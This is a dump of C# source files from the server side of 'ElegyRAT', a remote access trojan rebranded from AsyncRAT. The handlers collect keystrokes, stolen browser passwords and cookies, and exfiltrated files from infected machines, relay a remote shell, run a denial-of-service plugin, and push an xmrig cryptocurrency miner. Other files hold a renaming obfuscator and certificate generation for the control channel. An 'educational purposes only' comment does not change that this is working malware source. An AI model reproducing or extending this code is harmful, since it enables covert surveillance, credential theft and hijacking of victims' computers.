14 | public class HandleChat
15 | {
16 | public void Read(MsgPack unpack_msgpack, Clients client)
17 | {
18 | try
19 | {
20 | FormChat chat = (FormChat)Application.OpenForms["chat:" + unpack_msgpack.ForcePathObject("Hwid").AsString];
21 | if (chat != null)
22 | {
23 | Console.Beep();
24 | chat.richTextBox1.AppendText(unpack_msgpack.ForcePathObject("WriteInput").AsString);
25 | chat.richTextBox1.SelectionStart = chat.richTextBox1.TextLength;
26 | chat.richTextBox1.ScrollToCaret();
27 | }
28 | else
29 | {
30 | MsgPack msgpack = new MsgPack();
31 | msgpack.ForcePathObject("Packet").AsString = "chatExit";
32 | ThreadPool.QueueUserWorkItem(client.Send, msgpack.Encode2Bytes());
33 | client.Disconnected();
34 | }
35 | }
36 | catch { }
37 | }
38 |
39 | public void GetClient(MsgPack unpack_msgpack, Clients client)
40 | {
41 | FormChat chat = (FormChat)Application.OpenForms["chat:" + unpack_msgpack.ForcePathObject("Hwid").AsString];
42 | if (chat != null)
43 | {
44 | if (chat.Client == null)
45 | {
46 | chat.Client = client;
47 | chat.textBox1.Enabled = true;
48 | chat.timer1.Enabled = true;
49 | }
50 |
51 | }
52 | }
53 | }
54 | }
55 |
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Server/Handle Packet/HandleDos.cs:
--------------------------------------------------------------------------------
1 | using Server.Connection;
2 | using Server.Forms;
3 | using Server.MessagePack;
4 | using System;
5 | using System.Collections.Generic;
6 | using System.Linq;
7 | using System.Text;
8 | using System.Threading.Tasks;
9 | using System.Windows.Forms;
10 |
11 | namespace Server.Handle_Packet
12 | {
13 | class HandleDos
14 | {
15 | public void Add(Clients client, MsgPack unpack_msgpack)
16 | {
17 | try
18 | {
19 | FormDOS DOS = (FormDOS)Application.OpenForms["DOS"];
20 | if (DOS != null)
21 | {
22 | lock (DOS.sync)
23 | DOS.PlguinClients.Add(client);
24 | }
25 | }
26 | catch { }
27 | }
28 | }
29 | }
30 |
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Server/Handle Packet/HandleKeylogger.cs:
--------------------------------------------------------------------------------
1 | using Server.Forms;
2 | using Server.MessagePack;
3 | using Server.Connection;
4 | using System;
5 | using System.Diagnostics;
6 | using System.Drawing;
7 | using System.IO;
8 | using System.Windows.Forms;
9 |
10 | namespace Server.Handle_Packet
11 | {
12 | class HandleKeylogger
13 | {
14 | public HandleKeylogger(Clients client, MsgPack unpack_msgpack)
15 | {
16 | try
17 | {
18 | FormKeylogger KL = (FormKeylogger)Application.OpenForms["keyLogger:" + unpack_msgpack.ForcePathObject("Hwid").GetAsString()];
19 | if (KL != null)
20 | {
21 | if (KL.Client == null)
22 | {
23 | KL.Client = client;
24 | KL.timer1.Enabled = true;
25 | }
26 | KL.Sb.Append(unpack_msgpack.ForcePathObject("Log").GetAsString());
27 | KL.richTextBox1.Text = KL.Sb.ToString();
28 | KL.richTextBox1.SelectionStart = KL.richTextBox1.TextLength;
29 | KL.richTextBox1.ScrollToCaret();
30 | }
31 | else
32 | {
33 | MsgPack msgpack = new MsgPack();
34 | msgpack.ForcePathObject("Packet").AsString = "keyLogger";
35 | msgpack.ForcePathObject("isON").AsString = "false";
36 | client.Send(msgpack.Encode2Bytes());
37 | }
38 | }
39 | catch { }
40 | }
41 | }
42 | }
43 |
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Server/Handle Packet/HandleLogs.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Windows.Forms;
3 | using System.Drawing;
4 |
5 | namespace Server.Handle_Packet
6 | {
7 | public class HandleLogs
8 | {
9 | public void Addmsg(string Msg, Color color)
10 | {
11 | try
12 | {
13 | ListViewItem LV = new ListViewItem();
14 | LV.Text = DateTime.Now.ToLongTimeString();
15 | LV.SubItems.Add(Msg);
16 | LV.ForeColor = color;
17 |
18 | if (Program.form1.InvokeRequired)
19 | {
20 | Program.form1.Invoke((MethodInvoker)(() =>
21 | {
22 | lock (Settings.LockListviewLogs)
23 | {
24 | Program.form1.listView5.Items.Insert(0, LV);
25 | }
26 | }));
27 | }
28 | else
29 | {
30 | lock (Settings.LockListviewLogs)
31 | {
32 | Program.form1.listView5.Items.Insert(0, LV);
33 | }
34 | }
35 |
36 | }
37 | catch { }
38 | }
39 | }
40 | }
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Server/Handle Packet/HandleMiner.cs:
--------------------------------------------------------------------------------
1 | using Server.Algorithm;
2 | using Server.Connection;
3 | using Server.MessagePack;
4 | using System.Diagnostics;
5 | using System.IO;
6 | using System.Threading;
7 |
8 | namespace Server.Handle_Packet
9 | {
10 | public class HandleMiner
11 | {
12 | public void SendMiner(Clients client)
13 | {
14 | MsgPack packet = new MsgPack();
15 | packet.ForcePathObject("Packet").AsString = "xmr";
16 | packet.ForcePathObject("Command").AsString = "save";
17 | packet.ForcePathObject("Bin").SetAsBytes(Zip.Compress(File.ReadAllBytes(@"Plugins\xmrig.bin")));
18 | packet.ForcePathObject("Hash").AsString = GetHash.GetChecksum(@"Plugins\xmrig.bin");
19 | packet.ForcePathObject("Pool").AsString = XmrSettings.Pool;
20 | packet.ForcePathObject("Wallet").AsString = XmrSettings.Wallet;
21 | packet.ForcePathObject("Pass").AsString = XmrSettings.Pass;
22 | packet.ForcePathObject("InjectTo").AsString = XmrSettings.InjectTo;
23 | ThreadPool.QueueUserWorkItem(client.Send, packet.Encode2Bytes());
24 | Debug.WriteLine("XMR sent");
25 | }
26 | }
27 | }
28 |
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Server/Handle Packet/HandlePing.cs:
--------------------------------------------------------------------------------
1 | using Server.MessagePack;
2 | using Server.Connection;
3 | using System.Diagnostics;
4 | using System.Windows.Forms;
5 | using System.Threading;
6 | using System.Drawing;
7 | using Microsoft.VisualBasic;
8 |
9 | namespace Server.Handle_Packet
10 | {
11 | public class HandlePing
12 | {
13 | public void Ping(Clients client, MsgPack unpack_msgpack)
14 | {
15 | try
16 | {
17 | MsgPack msgpack = new MsgPack();
18 | msgpack.ForcePathObject("Packet").SetAsString("pong");
19 | ThreadPool.QueueUserWorkItem(client.Send, msgpack.Encode2Bytes());
20 | lock (Settings.LockListviewClients)
21 | if (client.LV != null)
22 | client.LV.SubItems[Program.form1.lv_act.Index].Text = unpack_msgpack.ForcePathObject("Message").AsString;
23 | else
24 | Debug.WriteLine("Temp socket pinged server");
25 | }
26 | catch { }
27 | }
28 |
29 | public void Pong(Clients client, MsgPack unpack_msgpack)
30 | {
31 | try
32 | {
33 | lock (Settings.LockListviewClients)
34 | if (client.LV != null)
35 | {
36 | int interval = (int)unpack_msgpack.ForcePathObject("Message").AsInteger;
37 | client.LV.SubItems[Program.form1.lv_ping.Index].Text = interval + " MS";
38 | if (interval > 400)
39 | {
40 | client.LV.SubItems[Program.form1.lv_ping.Index].ForeColor = Color.Red;
41 | }
42 | else if (interval > 200)
43 | {
44 | client.LV.SubItems[Program.form1.lv_ping.Index].ForeColor = Color.Orange;
45 | }
46 | else
47 | {
48 | client.LV.SubItems[Program.form1.lv_ping.Index].ForeColor = Color.Green;
49 | }
50 | }
51 |
52 | }
53 | catch { }
54 | }
55 | }
56 | }
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Server/Handle Packet/HandleProcessManager.cs:
--------------------------------------------------------------------------------
1 | using Server.Forms;
2 | using Server.MessagePack;
3 | using Server.Connection;
4 | using System;
5 | using System.Drawing;
6 | using System.IO;
7 | using System.Windows.Forms;
8 |
9 | namespace Server.Handle_Packet
10 | {
11 | public class HandleProcessManager
12 | {
13 | public void GetProcess(Clients client, MsgPack unpack_msgpack)
14 | {
15 | try
16 | {
17 | FormProcessManager PM = (FormProcessManager)Application.OpenForms["processManager:" + unpack_msgpack.ForcePathObject("Hwid").AsString];
18 | if (PM != null)
19 | {
20 | if (PM.Client == null)
21 | {
22 | PM.Client = client;
23 | PM.listView1.Enabled = true;
24 | PM.timer1.Enabled = true;
25 | }
26 | PM.listView1.Items.Clear();
27 | PM.imageList1.Images.Clear();
28 | string processLists = unpack_msgpack.ForcePathObject("Message").AsString;
29 | string[] _NextProc = processLists.Split(new[] { "-=>" }, StringSplitOptions.None);
30 | for (int i = 0; i < _NextProc.Length; i++)
31 | {
32 | if (_NextProc[i].Length > 0)
33 | {
34 | ListViewItem lv = new ListViewItem
35 | {
36 | Text = Path.GetFileName(_NextProc[i])
37 | };
38 | lv.SubItems.Add(_NextProc[i + 1]);
39 | lv.ToolTipText = _NextProc[i];
40 | Image im = Image.FromStream(new MemoryStream(Convert.FromBase64String(_NextProc[i + 2])));
41 | PM.imageList1.Images.Add(_NextProc[i + 1], im);
42 | lv.ImageKey = _NextProc[i + 1];
43 | PM.listView1.Items.Add(lv);
44 | }
45 | i += 2;
46 | }
47 | }
48 |
49 | }
50 | catch { }
51 | }
52 | }
53 | }
54 |
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Server/Handle Packet/HandleRecovery.cs:
--------------------------------------------------------------------------------
1 | using Server.MessagePack;
2 | using Server.Connection;
3 | using System;
4 | using System.Collections.Generic;
5 | using System.Drawing;
6 | using System.IO;
7 | using System.Linq;
8 | using System.Text;
9 | using System.Threading.Tasks;
10 | using System.Windows.Forms;
11 |
12 | namespace Server.Handle_Packet
13 | {
14 | public class HandleRecovery
15 | {
16 | public HandleRecovery(Clients client, MsgPack unpack_msgpack)
17 | {
18 | try
19 | {
20 | string fullPath = Path.Combine(Application.StartupPath, "ClientsFolder", unpack_msgpack.ForcePathObject("Hwid").AsString, "Recovery");
21 | string pass = unpack_msgpack.ForcePathObject("Password").AsString;
22 | string cookies = unpack_msgpack.ForcePathObject("Cookies").AsString;
23 | if (!string.IsNullOrWhiteSpace(pass) || !string.IsNullOrWhiteSpace(cookies))
24 | {
25 | if (!Directory.Exists(fullPath))
26 | Directory.CreateDirectory(fullPath);
27 | File.WriteAllText(fullPath + "\\Password_" + DateTime.Now.ToString("MM-dd-yyyy HH;mm;ss") + ".txt", pass.Replace("\n", Environment.NewLine));
28 | File.WriteAllText(fullPath + "\\Cookies_" + DateTime.Now.ToString("MM-dd-yyyy HH;mm;ss") + ".txt", cookies);
29 | //new HandleLogs().Addmsg($"Client {client.Ip} recovered passwords successfully @ ClientsFolder \\ {unpack_msgpack.ForcePathObject("Hwid").AsString} \\ Recovery", Color.Purple);
30 | new HandleLogs().Addmsg($"客户端 {client.Ip} 成功获取到浏览器密码 @ 客户端文件夹 \\ {unpack_msgpack.ForcePathObject("Hwid").AsString} \\ 获取", Color.Purple);
31 | }
32 | else
33 | {
34 | //new HandleLogs().Addmsg($"Client {client.Ip} has no passwords", Color.MediumPurple);
35 | new HandleLogs().Addmsg($"客户端 {client.Ip} 没有密码", Color.MediumPurple);
36 | }
37 | client?.Disconnected();
38 | }
39 | catch (Exception ex)
40 | {
41 | new HandleLogs().Addmsg(ex.Message, Color.Red);
42 | }
43 | }
44 | }
45 | }
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Server/Handle Packet/HandleReportWindow.cs:
--------------------------------------------------------------------------------
1 | using Server.Connection;
2 | using System;
3 | using System.Collections.Generic;
4 | using System.Drawing;
5 | using System.Linq;
6 | using System.Text;
7 | using System.Threading.Tasks;
8 | using System.Windows.Forms;
9 |
10 | namespace Server.Handle_Packet
11 | {
12 | public class HandleReportWindow
13 | {
14 | public HandleReportWindow(Clients client, string title)
15 | {
16 | //new HandleLogs().Addmsg($"Client {client.Ip} Opened [{title}]", Color.Blue);
17 | new HandleLogs().Addmsg($"客户端 {client.Ip} 打开 [{title}]", Color.Blue);
18 | if (Properties.Settings.Default.Notification == true)
19 | {
20 | //Program.form1.notifyIcon1.BalloonTipText = $"Client {client.Ip} Opened [{title}]";
21 | Program.form1.notifyIcon1.BalloonTipText = $"客户端 {client.Ip} 打开 [{title}]";
22 | Program.form1.notifyIcon1.ShowBalloonTip(100);
23 | }
24 | }
25 | }
26 | }
27 |
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Server/Handle Packet/HandleShell.cs:
--------------------------------------------------------------------------------
1 | using Server.Forms;
2 | using Server.MessagePack;
3 | using Server.Connection;
4 | using System;
5 | using System.Collections.Generic;
6 | using System.Linq;
7 | using System.Text;
8 | using System.Threading.Tasks;
9 | using System.Windows.Forms;
10 |
11 | namespace Server.Handle_Packet
12 | {
13 | public class HandleShell
14 | {
15 | public HandleShell(MsgPack unpack_msgpack, Clients client)
16 | {
17 | FormShell shell = (FormShell)Application.OpenForms["shell:" + unpack_msgpack.ForcePathObject("Hwid").AsString];
18 | if (shell != null)
19 | {
20 | if (shell.Client == null)
21 | {
22 | shell.Client = client;
23 | shell.timer1.Enabled = true;
24 | }
25 | shell.richTextBox1.AppendText(unpack_msgpack.ForcePathObject("ReadInput").AsString);
26 | shell.richTextBox1.SelectionStart = shell.richTextBox1.TextLength;
27 | shell.richTextBox1.ScrollToCaret();
28 | }
29 | }
30 | }
31 | }
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Server/Handle Packet/HandleThumbnails.cs:
--------------------------------------------------------------------------------
1 | using Server.MessagePack;
2 | using Server.Connection;
3 | using System.Diagnostics;
4 | using System.Drawing;
5 | using System.IO;
6 | using System.Windows.Forms;
7 |
8 | namespace Server.Handle_Packet
9 | {
10 | public class HandleThumbnails
11 | {
12 | public HandleThumbnails(Clients client, MsgPack unpack_msgpack)
13 | {
14 | try
15 | {
16 | if (client.LV2 == null)
17 | {
18 | client.LV2 = new ListViewItem();
19 | client.LV2.Text = string.Format("{0}:{1}", client.Ip, client.TcpClient.LocalEndPoint.ToString().Split(':')[1]);
20 | client.LV2.ToolTipText = client.ID;
21 | client.LV2.Tag = client;
22 |
23 | using (MemoryStream memoryStream = new MemoryStream(unpack_msgpack.ForcePathObject("Image").GetAsBytes()))
24 | {
25 |
26 | Program.form1.ThumbnailImageList.Images.Add(client.ID, Bitmap.FromStream(memoryStream));
27 | client.LV2.ImageKey = client.ID;
28 | lock (Settings.LockListviewThumb)
29 | {
30 | Program.form1.listView3.Items.Add(client.LV2);
31 | }
32 | }
33 | }
34 | else
35 | {
36 | using (MemoryStream memoryStream = new MemoryStream(unpack_msgpack.ForcePathObject("Image").GetAsBytes()))
37 | {
38 | lock (Settings.LockListviewThumb)
39 | {
40 | Program.form1.ThumbnailImageList.Images.RemoveByKey(client.ID);
41 | Program.form1.ThumbnailImageList.Images.Add(client.ID, Bitmap.FromStream(memoryStream));
42 | }
43 | }
44 | }
45 | }
46 | catch { }
47 | }
48 | }
49 | }
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Server/Handle Packet/HandlerFileSearcher.cs:
--------------------------------------------------------------------------------
1 | using Server.Connection;
2 | using Server.MessagePack;
3 | using System;
4 | using System.Collections.Generic;
5 | using System.Drawing;
6 | using System.IO;
7 | using System.Linq;
8 | using System.Text;
9 | using System.Threading.Tasks;
10 | using System.Windows.Forms;
11 |
12 | namespace Server.Handle_Packet
13 | {
14 | public class HandlerFileSearcher
15 | {
16 | public async void SaveZipFile(Clients client, MsgPack unpack_msgpack)
17 | {
18 | try
19 | {
20 | string fullPath = Path.Combine(Application.StartupPath, "ClientsFolder", unpack_msgpack.ForcePathObject("Hwid").AsString, "FileSearcher");
21 | if (!Directory.Exists(fullPath))
22 | Directory.CreateDirectory(fullPath);
23 | await Task.Run(() =>
24 | {
25 | byte[] zipFile = unpack_msgpack.ForcePathObject("ZipFile").GetAsBytes();
26 | File.WriteAllBytes(fullPath + "//" + DateTime.Now.ToString("MM-dd-yyyy HH;mm;ss") + ".zip", zipFile);
27 | });
28 | //new HandleLogs().Addmsg($"Client {client.Ip} file searcher was successfully @ ClientsFolder/{unpack_msgpack.ForcePathObject("Hwid").AsString}/FileSearcher", Color.Purple);
29 | new HandleLogs().Addmsg($"客户端 {client.Ip} 文件搜索程序成功 @ 客户端文件夹/{unpack_msgpack.ForcePathObject("Hwid").AsString}/文件搜索", Color.Purple);
30 | client.Disconnected();
31 | }
32 | catch (Exception ex)
33 | {
34 | //new HandleLogs().Addmsg($"FileSearcher {ex.Message}", Color.Red);
35 | new HandleLogs().Addmsg($"文件搜索 {ex.Message}", Color.Red);
36 | }
37 | }
38 | }
39 | }
40 |
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Server/Helper/AsyncTask.cs:
--------------------------------------------------------------------------------
1 | using Server.MessagePack;
2 | using Server.Connection;
3 | using System;
4 | using System.Collections.Generic;
5 | using System.Linq;
6 | using System.Text;
7 | using System.Threading.Tasks;
8 | using System.Windows.Forms;
9 | using System.Threading;
10 | using System.Diagnostics;
11 |
12 | namespace Server.Helper
13 | {
14 | public class AsyncTask
15 | {
16 | public byte[] msgPack;
17 | public string id;
18 | public List doneClient;
19 |
20 | public AsyncTask(byte[] _msgPack, string _id)
21 | {
22 | msgPack = _msgPack;
23 | id = _id;
24 | doneClient = new List();
25 | }
26 | }
27 |
28 | }
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Server/Helper/CreateCertificate.cs:
--------------------------------------------------------------------------------
1 | using Org.BouncyCastle.Asn1.X509;
2 | using Org.BouncyCastle.Crypto;
3 | using Org.BouncyCastle.Crypto.Generators;
4 | using Org.BouncyCastle.Crypto.Operators;
5 | using Org.BouncyCastle.Crypto.Parameters;
6 | using Org.BouncyCastle.Crypto.Prng;
7 | using Org.BouncyCastle.Math;
8 | using Org.BouncyCastle.Security;
9 | using Org.BouncyCastle.X509;
10 | using Org.BouncyCastle.X509.Extension;
11 | using System;
12 | using System.Collections.Generic;
13 | using System.Linq;
14 | using System.Security.Cryptography.X509Certificates;
15 | using System.Text;
16 | using System.Threading.Tasks;
17 |
18 | namespace Server.Helper
19 | {
20 | public static class CreateCertificate
21 | {
22 | public static X509Certificate2 CreateCertificateAuthority(string caName, int keyStrength)
23 | {
24 | var random = new SecureRandom(new CryptoApiRandomGenerator());
25 | var keyPairGen = new RsaKeyPairGenerator();
26 | keyPairGen.Init(new KeyGenerationParameters(random, keyStrength));
27 | AsymmetricCipherKeyPair keypair = keyPairGen.GenerateKeyPair();
28 |
29 | var certificateGenerator = new X509V3CertificateGenerator();
30 |
31 | var CN = new X509Name("CN=" + caName);
32 | var SN = BigInteger.ProbablePrime(120, random);
33 |
34 | certificateGenerator.SetSerialNumber(SN);
35 | certificateGenerator.SetSubjectDN(CN);
36 | certificateGenerator.SetIssuerDN(CN);
37 | certificateGenerator.SetNotAfter(DateTime.MaxValue);
38 | certificateGenerator.SetNotBefore(DateTime.UtcNow.Subtract(new TimeSpan(2, 0, 0, 0)));
39 | certificateGenerator.SetPublicKey(keypair.Public);
40 | certificateGenerator.AddExtension(X509Extensions.SubjectKeyIdentifier, false, new SubjectKeyIdentifierStructure(keypair.Public));
41 | certificateGenerator.AddExtension(X509Extensions.BasicConstraints, true, new BasicConstraints(true));
42 |
43 | ISignatureFactory signatureFactory = new Asn1SignatureFactory("SHA512WITHRSA", keypair.Private, random);
44 |
45 | var certificate = certificateGenerator.Generate(signatureFactory);
46 |
47 | var certificate2 = new X509Certificate2(DotNetUtilities.ToX509Certificate(certificate));
48 | certificate2.PrivateKey = DotNetUtilities.ToRSA(keypair.Private as RsaPrivateCrtKeyParameters);
49 |
50 | return certificate2;
51 | }
52 | }
53 | }
54 |
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Server/Helper/ListviewDoubleBuffer.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Linq;
4 | using System.Reflection;
5 | using System.Text;
6 | using System.Threading.Tasks;
7 | using System.Windows.Forms;
8 |
9 | namespace Server.Helper
10 | {
11 | public static class ListviewDoubleBuffer
12 | {
13 | public static void Enable(ListView listView)
14 | {
15 | PropertyInfo aProp = typeof(Control).GetProperty("DoubleBuffered", BindingFlags.NonPublic | BindingFlags.Instance);
16 | aProp.SetValue(listView, true, null);
17 | }
18 | }
19 | }
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Server/Helper/Methods.cs:
--------------------------------------------------------------------------------
1 | using Microsoft.VisualBasic;
2 | using Server.Algorithm;
3 | using Server.Handle_Packet;
4 | using System;
5 | using System.Diagnostics;
6 | using System.Drawing;
7 | using System.IO;
8 | using System.Text;
9 | using System.Threading.Tasks;
10 | using System.Windows.Forms;
11 |
12 | namespace Server.Helper
13 | {
14 | public static class Methods
15 | {
16 | private const string Alphabet = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";
17 | public static string BytesToString(long byteCount)
18 | {
19 | string[] suf = { "B", "KB", "MB", "GB", "TB", "PB", "EB" };
20 | if (byteCount == 0)
21 | return "0" + suf[0];
22 | long bytes = Math.Abs(byteCount);
23 | int place = Convert.ToInt32(Math.Floor(Math.Log(bytes, 1024)));
24 | double num = Math.Round(bytes / Math.Pow(1024, place), 1);
25 | return (Math.Sign(byteCount) * num).ToString() + suf[place];
26 | }
27 |
28 | public static async Task FadeIn(Form o, int interval = 80)
29 | {
30 | while (o.Opacity < 1.0)
31 | {
32 | await Task.Delay(interval);
33 | o.Opacity += 0.05;
34 | }
35 | }
36 |
37 | public static Random Random = new Random();
38 | public static string GetRandomString(int length)
39 | {
40 | StringBuilder randomName = new StringBuilder(length);
41 | for (int i = 0; i < length; i++)
42 | randomName.Append(Alphabet[Random.Next(Alphabet.Length)]);
43 |
44 | return randomName.ToString();
45 | }
46 | }
47 | }
48 |
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Server/Helper/ReferenceLoader.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Globalization;
4 | using System.Linq;
5 | using System.Reflection;
6 | using System.Text;
7 | using System.Threading.Tasks;
8 |
9 | namespace Server.Helper
10 | {
11 | public class ReferenceLoader : MarshalByRefObject
12 | {
13 | public string[] LoadReferences(string assemblyPath)
14 | {
15 | try
16 | {
17 | var assembly = Assembly.ReflectionOnlyLoadFrom(assemblyPath);
18 | var paths = assembly.GetReferencedAssemblies().Select(x => x.FullName).ToArray();
19 | return paths;
20 | }
21 | catch { return null; }
22 | }
23 |
24 | public void AppDomainSetup(string assemblyPath)
25 | {
26 | try
27 | {
28 | var settings = new AppDomainSetup
29 | {
30 | ApplicationBase = AppDomain.CurrentDomain.BaseDirectory,
31 | };
32 | var childDomain = AppDomain.CreateDomain(Guid.NewGuid().ToString(), null, settings);
33 |
34 | var handle = Activator.CreateInstance(childDomain,
35 | typeof(ReferenceLoader).Assembly.FullName,
36 | typeof(ReferenceLoader).FullName,
37 | false, BindingFlags.NonPublic | BindingFlags.Public | BindingFlags.Instance, null, null, CultureInfo.CurrentCulture, new object[0]);
38 |
39 | var loader = (ReferenceLoader)handle.Unwrap();
40 | //This operation is executed in the new AppDomain
41 | var paths = loader.LoadReferences(assemblyPath);
42 | AppDomain.Unload(childDomain);
43 | return;
44 | }
45 | catch { }
46 | }
47 | }
48 | }
49 |
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Server/MessagePack/MsgPackType.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Linq;
4 | using System.Text;
5 | using System.Threading.Tasks;
6 |
7 | namespace Server.MessagePack
8 | {
9 | public enum MsgPackType
10 | {
11 | Unknown = 0,
12 | Null = 1,
13 | Map = 2,
14 | Array = 3,
15 | String = 4,
16 | Integer = 5,
17 | UInt64 = 6,
18 | Boolean = 7,
19 | Float = 8,
20 | Single = 9,
21 | DateTime = 10,
22 | Binary = 11
23 | }
24 | }
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Server/Program.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.IO;
4 | using System.Linq;
5 | using System.Threading.Tasks;
6 | using System.Windows.Forms;
7 |
8 | /*
9 | │ Author : NYAN CAT
10 | │ Name : AsyncRAT Simple RAT
11 | │ Contact Me : https:github.com/NYAN-x-CAT
12 |
13 | This program Is distributed for educational purposes only.
14 | */
15 |
16 | namespace Server
17 | {
18 | static class Program
19 | {
20 | ///
21 | /// The main entry point for the application.
22 | ///
23 | [STAThread]
24 | static void Main()
25 | {
26 | Application.EnableVisualStyles();
27 | Application.SetCompatibleTextRenderingDefault(false);
28 | try
29 | {
30 | string batPath = Path.Combine(Application.StartupPath, "Fixer.bat");
31 | if (!File.Exists(batPath))
32 | File.WriteAllText(batPath, Properties.Resources.Fixer);
33 | }
34 | catch { }
35 | form1 = new Form1();
36 | Application.Run(form1);
37 | }
38 | public static Form1 form1;
39 | }
40 | }
41 |
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Server/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | /*
9 | [assembly: AssemblyTitle("AsyncRAT")]
10 | [assembly: AssemblyDescription("NYAN CAT")]
11 | [assembly: AssemblyConfiguration("")]
12 | [assembly: AssemblyCompany("")]
13 | [assembly: AssemblyProduct("AsyncRAT")]
14 | [assembly: AssemblyCopyright("Copyright © 2019")]
15 | [assembly: AssemblyTrademark("")]
16 | [assembly: AssemblyCulture("")]
17 | */
18 | [assembly: AssemblyTitle("ElegyRAT")]
19 | [assembly: AssemblyDescription("NYAN CAT")]
20 | [assembly: AssemblyConfiguration("")]
21 | [assembly: AssemblyCompany("")]
22 | [assembly: AssemblyProduct("ElegyRAT")]
23 | [assembly: AssemblyCopyright("Copyright © 2020")]
24 | [assembly: AssemblyTrademark("")]
25 | [assembly: AssemblyCulture("")]
26 | // Setting ComVisible to false makes the types in this assembly not visible
27 | // to COM components. If you need to access a type in this assembly from
28 | // COM, set the ComVisible attribute to true on that type.
29 | [assembly: ComVisible(false)]
30 |
31 | // The following GUID is for the ID of the typelib if this project is exposed to COM
32 |
33 | // Version information for an assembly consists of the following four values:
34 | //
35 | // Major Version
36 | // Minor Version
37 | // Build Number
38 | // Revision
39 | //
40 | // You can specify all the values or you can default the Build and Revision Numbers
41 | // by using the '*' as shown below:
42 | // [assembly: AssemblyVersion("1.0.*")]
43 | [assembly: AssemblyVersion("0.1.1.0")]
44 | [assembly: AssemblyFileVersion("0.1.1.0")]
45 |
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Server/RenamingObfuscation/Classes/Base64.cs:
--------------------------------------------------------------------------------
1 | using Server.RenamingObfuscation.Interfaces;
2 | using System;
3 | using System.Collections.Generic;
4 | using System.Linq;
5 | using System.Text;
6 | using System.Threading.Tasks;
7 |
8 | namespace Server.RenamingObfuscation.Classes
9 | {
10 | public class Base64 : ICrypto
11 | {
12 | ///
13 | /// Method for encrypt string with Base64.
14 | ///
15 | /// Input plain string
16 | /// Encode string
17 | public string Encrypt(string dataPlain)
18 | {
19 | try
20 | {
21 | return Convert.ToBase64String(Encoding.UTF8.GetBytes(dataPlain));
22 | }
23 |
24 | catch (Exception)
25 | {
26 | return null;
27 | }
28 | }
29 | }
30 | }
31 |
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Server/RenamingObfuscation/Classes/DecryptionHelper.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Linq;
4 | using System.Text;
5 | using System.Threading.Tasks;
6 |
7 | namespace Server.RenamingObfuscation.Classes
8 | {
9 | internal static class DecryptionHelper
10 | {
11 | ///
12 | /// Method for decrypt string with Base64.
13 | ///
14 | /// Input encode string
15 | /// Plain string
16 | public static string Decrypt_Base64(string dataEnc)
17 | {
18 | try
19 | {
20 | return Encoding.UTF8.GetString(Convert.FromBase64String(dataEnc));
21 | }
22 |
23 | catch (Exception)
24 | {
25 | return null;
26 | }
27 | }
28 | }
29 | }
30 |
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Server/RenamingObfuscation/Classes/MethodsRenaming.cs:
--------------------------------------------------------------------------------
1 | using Server.RenamingObfuscation.Interfaces;
2 | using dnlib.DotNet;
3 |
4 |
5 | namespace Server.RenamingObfuscation.Classes
6 | {
7 | public class MethodsRenaming : IRenaming
8 | {
9 | public ModuleDefMD Rename(ModuleDefMD module)
10 | {
11 | ModuleDefMD moduleToRename = module;
12 |
13 | foreach (TypeDef type in moduleToRename.Types)
14 | {
15 | if (type.IsGlobalModuleType)
16 | continue;
17 | type.Name = Utils.GenerateRandomString();
18 | foreach (MethodDef method in type.Methods)
19 | {
20 | if (!method.IsSpecialName && !method.IsConstructor && !method.HasCustomAttributes && !method.IsAbstract && !method.IsVirtual && method.Name != "Main")
21 | method.Name = Utils.GenerateRandomString();
22 |
23 | foreach (ParamDef paramDef in method.ParamDefs)
24 | {
25 | paramDef.Name = Utils.GenerateRandomString();
26 | }
27 | }
28 | }
29 |
30 | return moduleToRename;
31 | }
32 | }
33 | }
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Server/RenamingObfuscation/Classes/PropertiesRenaming.cs:
--------------------------------------------------------------------------------
1 | using Server.RenamingObfuscation.Interfaces;
2 | using dnlib.DotNet;
3 |
4 | namespace Server.RenamingObfuscation.Classes
5 | {
6 | public class PropertiesRenaming : IRenaming
7 | {
8 | public ModuleDefMD Rename(ModuleDefMD module)
9 | {
10 | ModuleDefMD moduleToRename = module;
11 |
12 | foreach (TypeDef type in moduleToRename.GetTypes())
13 | {
14 | if (type.IsGlobalModuleType)
15 | continue;
16 |
17 | foreach (var property in type.Properties)
18 | {
19 | property.Name = Utils.GenerateRandomString();
20 | }
21 | }
22 |
23 | return moduleToRename;
24 | }
25 | }
26 | }
27 |
--------------------------------------------------------------------------------
